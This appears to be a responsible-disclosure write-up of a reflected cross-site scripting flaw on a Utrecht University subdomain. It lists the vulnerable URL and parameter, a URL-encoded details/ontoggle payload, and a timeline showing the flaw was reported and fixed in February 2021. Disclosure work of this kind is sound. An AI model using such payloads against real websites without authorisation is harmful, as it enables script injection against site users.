Utrecht University - Cross-Site Scripting Vulnerability

 

Vulnerability : Cross-Site Scripting (XSS) - Reflected

Sub-domain : https://www2.projects.science.uu.nl

Vulnerable URL : https://www2.projects.science.uu.nl/VRsenaatszaal/index_old.php?image=images/hall_vr_06.jpg&is_stereo=true

Vulnerable Parameter : image

XSS Payload : %22%3E%3Cdetails%20open%20ontoggle=confirm(/XSS_By_Nayanjyoti_Roy/)%3E

Timeline :
Feb 19,2021 - Report Sent
Feb 19,2021 - Confirmation Received
Feb 26,2021 - Vulnerability Fixed
March 02,2021 - Listed on their Hall-Of-Fame page

Environment :
OS : Windows 10 Pro
Browser : Firefox
Version : 85.0.2 ( 64-bit )

Researcher Name : Nayanjyoti Roy

Proof-Of-Concept video :